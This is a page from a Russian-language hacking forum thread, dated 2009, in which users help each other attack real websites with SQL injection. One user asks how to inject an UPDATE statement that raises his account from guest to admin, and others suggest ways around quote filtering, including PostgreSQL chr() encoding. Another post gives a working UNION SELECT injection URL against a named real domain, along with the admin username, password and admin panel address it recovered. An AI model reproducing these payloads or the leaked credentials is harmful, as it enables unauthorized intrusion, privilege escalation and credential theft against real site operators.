HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 512 из 2438 « Первая < 12412462502 508 509 510 511 512 513 514 515 516 52256261210121512 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5111  
Старый 29.01.2009, 03:13
omel
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117

Репутация: 1
По умолчанию
Цитата:
Сообщение от groundhog  
Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
 
Ответить с цитированием

  #5112  
Старый 29.01.2009, 03:25
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.
Последний раз редактировалось Велемир; 29.01.2009 в 03:29..
 
Ответить с цитированием

  #5113  
Старый 29.01.2009, 03:27
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от omel  
Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
кавычки экранируются во первых...
 
Ответить с цитированием

  #5114  
Старый 29.01.2009, 03:28
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию
ссыль дай

Цитата:
R1dex:

PostgreSql
сорри, не заметил
Последний раз редактировалось Pashkela; 29.01.2009 в 03:39..
 
Ответить с цитированием

  #5115  
Старый 29.01.2009, 03:30
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Цитата:
Сообщение от Pashkela  
ссыль дай
Кому адресовано?))
 
Ответить с цитированием

  #5116  
Старый 29.01.2009, 03:32
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию
Цитата:
Сообщение от Велемир  
Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.
Я и говорю, хекс не катит, а char действует. Просто надо чарить не как в MYSQL...

Вот например таблица user, переведённая в char для PostgreSQL.

chr(117)||chr(115)||chr(101)||chr(114)
 
Ответить с цитированием

  #5117  
Старый 29.01.2009, 03:35
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
 
Ответить с цитированием

  #5118  
Старый 29.01.2009, 03:45
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от Велемир  
Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
это конкатенация
 
Ответить с цитированием

  #5119  
Старый 29.01.2009, 03:49
omel
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117

Репутация: 1
По умолчанию
Цитата:
Сообщение от попугай  
кавычки экранируются во первых...
Так значит вместо кавычек ставить %27? запрос
UPDATE+%27auth%27'+SET+usertype=%27admin%27+WHERE+ user_id=2
 
Ответить с цитированием

  #5120  
Старый 29.01.2009, 03:51
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
По умолчанию
аж смешно,вот ещё одна така скуль
Код:
http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20FROM%20admin--
пароли такие же..
admin::root78
http://sex.dp.ua/admin.php
юзеров воще не нашол
 
Ответить с цитированием
Ответ
Страница 512 из 2438 « Первая < 12412462502 508 509 510 511 512 513 514 515 516 52256261210121512 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.